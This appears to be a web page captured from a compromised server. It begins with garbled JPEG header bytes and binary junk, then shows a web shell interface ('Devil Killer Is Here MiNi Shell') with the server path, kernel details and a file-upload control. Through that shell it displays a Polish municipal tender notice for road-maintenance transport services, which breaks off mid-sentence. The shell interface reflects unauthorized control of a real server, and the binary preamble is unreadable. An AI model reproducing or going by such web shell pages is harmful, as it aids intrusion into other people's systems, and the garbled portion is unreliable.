JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220303/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220303/0007385201-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> &#34;Świadczenie usług transportowych i sprzętowych w zakresie bieżącego utrzymania dróg oraz remontów gminnych i wewnętrznych dróg tłuczniowych na terenie Gminy Piekoszów w 2022 roku&#34; </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA PIEKOSZÓW</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 291010599</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Częstochowska 66A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Piekoszów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">26-065</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">świętokrzyskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL721 - Kielecki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gmina@piekoszow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.piekoszow.biuletyn.net</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> &#34;Świadczenie usług transportowych i sprzętowych w zakresie bieżącego utrzymania dróg oraz remontów gminnych i wewnętrznych dróg tłuczniowych na terenie Gminy Piekoszów w 2022 roku&#34; </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-aa9e3355-8fe5-11ec-9bc1-c2db95d08897</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00073852</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-03-03</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00046196/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Świadczenie usług transportowych i sprzętowych w zakresie bieżącego utrzymania dróg oraz remontów gminnych i wewnętrznych dróg tłuczniowych na ternie Gminy Piekoszówwych</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/Postepowania/e805237b-36a1-4603-a28a-63676e84b81b <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/Postepowania/e805237b-36a1-4603-a28a-63676e84b81b</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Regulamin ePUAP<br/>https://miniportal.uzp.gov.pl/warunkiUslugi.aspx</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016, str. 1), dalej „RODO”, Zamawiający informuje, że:<br/>1) administratorem Pani/Pana danych osobowych jest Gmina Piekoszów, 26-065 Piekoszów ul. Częstochowska 66a;<br/>2) inspektorem ochrony danych osobowych w Gminie Piekoszów jest Pan Robert Łabuda, e-mail: inspektor@cbi24.pl; 3) Pani/Pana<br/>dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie<br/>zamówienia publicznego pn. „Świadczenie usług transportowych i sprzętowych w zakresie bieżącego utrzymania dróg oraz<br/>remontów gminnych i wewnętrznych dróg tłuczniowych na terenie Gminy Piekoszów w 2022 roku”;<br/>4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 8 oraz art. 96 ust. 3 ustawy PZP<br/>5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 97 ust. 1 ustawą PZP, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy;<br/>6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym,<br/>określonym w przepisach ustawy PZP, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikają z ustawy PZP;<br/>7) w odniesieniu do Pani/Pana danych osobowych, decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art.<br/>22 RODO;<br/>8) posiada Pani/Pan:<br/>a) na podstawie art. 15 RODO - prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>b) na podstawie art. 16 RODO - prawo do sprostowania Pani/Pana danych osobowych;<br/>c) na podstawie art. 18 RODO - prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO;<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>9) nie przysługuje Pani/Panu:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;c) na podstawie art. 21 RODO prawo sprzeciwu,<br/>wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c<br/>RODO.<br/>10) w przypadku uznania, że przetwarzanie Pana/Pani danych osobowych narusza przepisy RODO, przysługuje Panu/Pani prawo<br/>do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa, tel. 22 531-03-00, e-mail:<br/>kancelaria@uodo.gov.pl.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IRO.271.2.4.2022.PK</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie zadania pn. &#34; Świadczenie usług transportowych i sprzętowych w zakresie<br/>bieżącego utrzymania dróg oraz remontów gminnych i wewnętrznych dróg tłuczniowych na terenie Gminy Piekoszów w<br/>2022 roku&#34;. Niniejsze zamówienie podzielone jest na 2 zadania:<br/>Zadanie 1 - &#34;Świadczenie usług transportowych i sprzętowych w zakresie bieżących remontów gminnych i wewnętrznych<br/>dróg tłuczniowych na terenie Gminy Piekoszów w 2022 roku&#34;.<br/>Zadanie 2 - &#34;Świadczenie usług transportowych i sprzętowych w zakresie bieżącego utrzymania dróg gminnych i<br/>wewnętrznych dróg tłuczniowych na terenie Gminy Piekoszów w 2022 roku&#34;.<br/>3) Zadanie nr 1 obejmuje świadczenie usługi n/w sprzętem i dotyczy remontów nawierzchni dróg tłuczniowych<br/>wymienionych w zał. nr 1 do SWZ. Zadanie będzie realizowane w II turach:<br/>I tura – 60 dni od daty przekazania terenu (z możliwością skrócenia do 45 dni);<br/>II tura – 60 dni od daty decyzji Zamawiającego o realizacji usługi (z możliwością skrócenia do 45 dni).<br/>a) W okresie realizacji zadania sprzęt objęty usługą ma być w ciągłej dyspozycji do świadczenia usługi aż do zakończenia<br/>realizacji danej tury, zakończenia świadczenia usługi w ramach danej tury rozumiane jest jako podpisanie protokołu odbioru<br/>robót.<br/>Brak dostępności sprzętu do świadczenia usługi może być spowodowany jego awarią lub niedyspozycją operatora sprzętu,<br/>potwierdzoną zwolnieniem lekarskim. W przypadku niedostępności sprzętu Wykonawca zobowiązany jest do podstawienia<br/>zastępstwa w terminie 2 roboczych dni od ustania świadczenia usługi.<br/>Opóźnienie w realizacji usługi z przyczyn leżących po stronie Zamawiającego może być podyktowane wyłącznie brakiem<br/>dostępności kruszywa na kopalni, z której będzie odbierany materiał przez Wykonawcę usługi, jednakże w okresie tym<br/>Wykonawca musi zachować dyspozycyjność do świadczenia usługi i przystąpić do niej ponownie w ciągu 2 dni roboczych,<br/>Ponadto okres wstrzymania robót ze strony Zamawiającego powoduje wydłużenie terminu realizacji danej tury.<br/>b) Usługi transportowe materiałów sypkich (kruszywo drogowe, piasek, destrukt asfaltowy) wraz z kierowcą, samochodem<br/>samowyładowczym o ładowności nie mniejszej niż 12 ton – prognozowana ilość usług: transport około 8 200 ton;<br/>c) Usługi maszyną do robót ziemnych – równiarką drogową samojezdną o mocy nie mniejszej niż 75 km wraz z obsługą<br/>operatorską – prognozowana ilość usług: około 400 roboczogodzin.<br/>4) Zadanie nr 2 dotyczy realizacji pozostałych usług związanych z bieżącym utrzymaniem infrastruktury drogowej. W tym<br/>przypadku Wykonawca jest zobowiązany do podstawienia zadysponowanych maszyn w terminie 2 dni roboczych od decyzji<br/>Zamawiającego i świadczenia usługi do zakończenia wskazanego zakresu robót.<br/>a) Zakres usług świadczonych w ramach zadania dotyczy usługi koparką kołową o pojemności łyżki nie mniejszej niż 0,4 m3<br/>wraz z obsługą operatorską – prognozowana ilość usług – około 400 roboczogodzin;<br/>b) Usługi transportowe polegające na odwozie urobku koparki wraz z kierowcą, samochodem samowyładowczym o<br/>ładowności min. 12 ton – prognozowana ilość usług: około 400 roboczogodzin;<br/>c) Usługi maszyną do robót ziemnych – zagęszczarką płytową o masie operacyjnej nie mniejszej niż 160 kg wraz z obsługą<br/>operatorską – prognozowana ilość usług: około 100 roboczogodzin. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60181000-0 - Wynajem samochodów ciężarowych wraz z kierowcą</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">43221000-8 - Równiarki drogowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocena ofert zostanie przeprowadzona wg. kryteriów oceny ofert</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Skrócenie realizacji: 10% - skrócenie realizacji usługi w zakresie zadania nr 1 (tura I, II) o 1 dzień – 0 punktów 20% - skrócenie realizacji usługi w zakresie zadania nr 1 (tura I, II) o 5 dni – 10 punktów 30% - skrócenie realizacji usługi w zakresie zadania nr 1 (tura, I, II) o 10 dni – 20 punktów 40% - skrócenie realizacji usługi w zakresie zadania nr 1 (tura, I, II) o 15 dni – 40 punktów</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Warunki udziału w postępowaniu, określone przez Zamawiającego:<br/>a) Warunki dotyczące zdolności do występowania w obrocie gospodarczym<br/>Zamawiający uzna warunek za spełniony, jeśli wykonawca, prowadzący działalność gospodarczą, wykaże, że jest wpisany<br/>do jednego z rejestrów zawodowych lub handlowych prowadzonych w kraju, w którym ma siedzibę lub miejsce<br/>zamieszkania, o ile taki wpis jest obowiązkowy.<br/>b) Warunki dotyczące uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z<br/>odrębnych przepisów<br/>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie wykonawca zobowiązany jest wykazać w<br/>sposób szczególny. Zamawiający uzna warunek za spełniony poprzez złożenie przez wykonawcę oświadczenia o spełnianiu<br/>warunków udziału w postępowaniu wg wzoru – zał. nr 3 do SWZ.<br/>c) Warunki dotyczące sytuacji ekonomicznej i finansowej<br/>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie wykonawca zobowiązany jest wykazać w<br/>sposób szczególny. Zamawiający uzna warunek za spełniony poprzez złożenie przez wykonawcę oświadczenia o spełnianiu<br/>warunków udziału w postępowaniu wg wzoru – zał. nr 3 do SWZ.<br/>d) Warunki dotyczące posiadania zdolności technicznej lub zawodowej<br/>Opis sposobu dokonywania oceny spełniania tego warunku:<br/>Doświadczenie: Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie wykonawca zobowiązany<br/>jest wykazać w sposób szczególny. Zamawiający uzna warunek za spełniony poprzez złożenie przez wykonawcę<br/>oświadczenia o spełnianiu warunków udziału w postępowaniu według wzoru - zał. nr 3 do SWZ.<br/>Potencjał techniczny: W celu wykonania zamówienia Zamawiający wymaga, aby wykonawca dysponował następującym<br/>sprzętem mechanicznym: − co najmniej dwoma (2) samochodami ciężarowym samowyładowczym o ładowności nie<br/>mniejszej niż 12 ton; − co najmniej jedną (1) maszyną do robót ziemnych – równiarką drogową samojezdną o mocy nie<br/>mniejszej niż 75 KM, co najmniej jedną (1) koparką kołową o pojemności łyżki nie mniejszej niż 0,4 m3, co najmniej jedną (1) maszyną do robót ziemnych – zagęszczarką płytową o masie operacyjnej nie mniejszej niż 160 kg.<br/>Potencjał kadrowy: W celu wykonania zamówienia Zamawiający wymaga, aby wykonawca dysponował następującym<br/>potencjałem kadrowym, tj. co najmniej trzema (3) osobami, w tym: − co najmniej dwoma kierowcami samochodu<br/>ciężarowego, posiadającym prawo jazdy kat. C zgodnie z ustawą z dnia 05 stycznia 2011 r. o kierujących pojazdami (t. j. Dz.<br/>U. z 2021 r. poz. 1212 z późn. zm.); − co najmniej jednym operatorem maszyny do robót ziemnych – równiarki drogowej<br/>samojezdnej i zagęszczarki płytowej, posiadającym odpowiednie uprawnienia do kierowania i obsługi równiarki drogowej<br/>oraz umiejętności obsługi zagęszczarki płytowej. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) W<br/>celu wstępnego potwierdzenia spełnienia warunków udziału w niniejszym postępowaniu oraz wykazaniu braku podstaw<br/>wykluczenia, Wykonawca jest zobowiązany do przedłożenia:<br/>a) Oświadczenia o spełnianiu warunków udziału w postępowaniu według wzoru – zał. nr 3 do SWZ<br/>b) Oświadczenia o braku podstaw do wykluczenia według wzoru – zał. nr 4 do SWZ<br/>c) Zobowiązania według wzoru stanowiącego zał. nr 5 do SWZ lub innego dokumentu potwierdzającego dysponowanie niezbędnymi<br/>zasobami innych podmiotów (jeżeli dotyczy).<br/>2) W celu potwierdzenia spełniania warunków udziału w postępowaniu, Zamawiający żąda od wykonawcy następujących<br/>dokumentów:<br/>a) wykazu urządzeń technicznych dostępnych wykonawcy w celu wykonania zamówienia wraz z informacją o podstawie do<br/>dysponowania tymi zasobami – minimum: - dwoma samochodami ciężarowymi o ładowności nie mniejszej niż 12 ton, jedną<br/>równiarką drogową samojezdną o mocy nie mniejszej niż 75 KM, jedną koparką kołową o pojemności łyżki nie mniejszej niż 0,4 m3,<br/>jedną zagęszczarką płytową, wraz z załączonymi kserokopiami dokumentów: ważnego ubezpieczenia OC, ważnego dowodu<br/>rejestracyjnego z aktualnymi badaniami technicznymi, zgodnie ze wzorem stanowiącym zał. nr 6 do SWZ;<br/>b) wykaz osób skierowanych przez wykonawcę do realizacji zamówienia minimum: jeden kierowca samochodu ciężarowego<br/>posiadający prawo jazdy kat. C, jeden operator koparki kołowej, jeden operator równiarki drogowej i zagęszczarki płytowej, wraz z<br/>załączonymi kserokopiami dokumentów: prawo jazdy kat. C, uprawnieniami do kierowania i obsługi koparki i równiarki, zgodnie ze<br/>wzorem stanowiącym zał. nr 7 do SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia braku<br/>podstaw wykluczenia, Zamawiający żąda od wykonawcy następujących dokumentów:<br/>a) informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 108 ust. 1 pkt 1, 2 i 4 ustawy PZP, sporządzonej nie<br/>wcześniej niż 6 miesięcy przed jej złożeniem – w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 108 ust. 1 pkt 1, 2<br/>i 4 ustawy PZP;<br/>b) oświadczenia wykonawcy o przynależności albo braku przynależności do tej samej grupy kapitałowej; w przypadku przynależności<br/>do tej samej grupy kapitałowej wykonawca może złożyć wraz z oświadczeniem dokumenty bądź informacje potwierdzające, że<br/>powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu; wzór oświadczenia stanowi zał. nr 8 do<br/>SWZ;<br/>c) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej,<br/>sporządzonej nie wcześniej niż 3 miesięcy przed jej złożeniem – w celu potwierdzenia braku podstaw wykluczenia na podstawie art.<br/>109 ust. 1 pkt 4 ustawy PZP;<br/>d) oświadczenia wykonawcy o braku wydania wobec niego prawomocnego wyroku sądu lub ostatecznej decyzji administracyjnej o<br/>zaleganiu z uiszczaniem podatków, opłat lub składek na ubezpieczenia społeczne lub zdrowotne albo – w przypadku wydania<br/>takiego wyroku lub decyzji – dokumentów potwierdzających dokonanie płatności tych należności wraz z ewentualnymi odsetkami lub<br/>grzywnami lub zawarcie wiążącego porozumienia w sprawie spłat tych należności; wzór oświadczenia stanowi zał. nr 9 do SWZ.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1) Wykonawca zobowiązany jest do wniesienia wadium, przed upływem terminu składania ofert. Wysokość wadium wynosi:<br/>3.920,00 zł [słownie: trzy tysiące dziewięćset dwadzieścia złotych, 00/100].<br/>2) Wadium może być wniesione w:<br/>a) 